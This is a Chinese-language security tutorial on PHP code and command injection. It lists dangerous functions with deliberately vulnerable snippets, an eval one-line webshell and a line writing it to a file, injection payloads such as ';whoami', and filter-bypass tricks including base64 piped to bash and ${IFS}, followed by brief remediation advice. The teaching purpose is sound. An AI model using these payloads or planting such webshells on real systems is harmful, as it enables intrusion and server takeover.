代码执行:可执行脚本语言代码

命令执行:可执行系统(Linux、windows)命令

PHP敏感函数代码执行 #

eval()		//把字符串作为PHP代码执行
assert()	//检查一个断言是否为 FALSE,可用来执行代码
preg_replace()	//执行一个正则表达式的搜索和替换
call_user_func()//把第一个参数作为回调函数调用
call_user_func_array()//调用回调函数,并把一个数组参数作为回调函数的参数
array_map()		//为数组的每个元素应用回调函数 
1
2
3
4
5
6

eval:

<?php @eval($_POST["arg"])?>
1

eval函数会将提交上来的值作为PHP代码处理,可以提交phpinfo(); 或者生成一句话shell

fputs(fopen('shell.php','w+'),'<?php @eval($_POST[pass])?>');
1

preg_replace:(5.5版本以上已废弃/e修饰符)

<?php preg_replace("//e",$_GET['arg'],"start testing...");?>
1

当replacement 参数构成一个合理的php代码字符串的时候,/e 修正符将参数当做php代码执行

create_function:

<?php $test=$_GET["test"];$new_func=create_function('$a,$b', $test);$new_func(2,M_E);?>
1

在php 中使用create_function创建一个匿名函数(lambda-style) 如未对参数进行严格的过滤审查,可以通过提交特殊字符串给create_function执行任意代码.

使用${${ }}简单绕过:

<?php $str="echo \"Hello ".$_GET["arg"]."!!\"; ";eval($str);?>
1

代码使用反斜杠将echo后面的内容给转义了 与加addslashes()函数进行过滤是一样的 payload:arg=${${phpinfo()}}

PHP程序执行函数 (opens new window) #

system()		//执行外部程序,并且显示输出
exec()			//执行一个外部程序
shell_exec()	//通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
passthru()		//执行外部程序并且显示原始输出
pcntl_exec()	//在当前进程空间执行指定程序
popen()			//打开进程文件指针
proc_open()		//执行一个命令,并且打开用来输入/输出的文件指针
1
2
3
4
5
6
7

最简单的例子:

<?php $test = $_GET['cmd']; system($test); ?>
1

payload:?cmd=whoami 这样即可执行系统命令

举一个类似DVWA里边的例子:

<?php$test = $_GET['cmd'];system("ping -c 3 " . $test);?>
1

payload:?cmd=127.0.0.1;whoami

命令分隔符:

在Linux上,上面的 ; 也可以用 |、|| 代替

;前面的执行完执行后面的

|是管道符,显示后面的执行结果

||当前面的执行出错时执行后面的

可用**%0A**换行执行命令

在Windows上,不能用 ; 可以用&、&&、|、||代替

&前面的语句为假则直接执行后面的

&&前面的语句为假则直接出错,后面的也不执行

|直接执行后面的语句

||前面出错执行后面的

PHP 支持一个执行运算符:反引号(``) PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

 <?php echo `whoami`;?>
1

效果与函数 shell_exec() 相同,都是以字符串的形式返回一个命令的执行结果,可以保存到变量中

命令执行绕过技巧 #

正则审查

是否使用多行模式修饰符(/foo/m)

是否遗漏匹配对象末尾的换行符(/^\d+$/)

是否允许空白字符(\s)

是否误写反斜杠匹配模式(/\/)

可用**%0A换行执行命令,换行符自身是一个有效的目录分隔符**

cat 123/flag
cat 123%0A flag
1
2

黑名单绕过

<?php
$test = $_GET['cmd'];
$test = str_replace("cat", "", $test);
$test = str_replace("ls", "", $test);
$test = str_replace(" ", "", $test);
$test = str_replace("pwd", "", $test);
$test = str_replace("wget", "", $test);
var_dump($test);
system("ls -al '$test'");
?>
1
2
3
4
5
6
7
8
9
10

**shell特殊变量:**ca$1t、ca$@t fla$@g

单引号、双引号: c""at、ca''t、反斜线 c\at

base64编码:echo "Y2F0IGZsYWc="|base64 -d|bashHex编码: echo "63617420666c6167" | xxd -r -p|bash

利用变量: 执行ls命令: a=l;b=s;$a$b cat 1.php文件内容: a=c;b=at;c=1.php;$a$b ${c}

绕过空格

用**${IFS}**代替

读取文件的时候利用重定向符cat<flag

花括号无空格**{cat,666.txt}**

$IFS可截断后边的内容,cat flag$IFS666.txt

长度限制,通过构造文件来绕过

linux下可以用 1>a创建文件名为a的空文件 ls -t>test则会将目录按时间排序后写进test文件中 sh命令可以从一个文件中读取命令来执行

引号逃逸

恶意命令被扩在引号内,可用 \ 转义引号逃逸

修复方式 #

1、尽量不要使用以上的代码/命令执行函数

2、使用disable_funtion()禁用以上函数

3、过滤所有能当作命令分隔符使用的字符

上次更新: 11/2/2023, 3:02:48 AM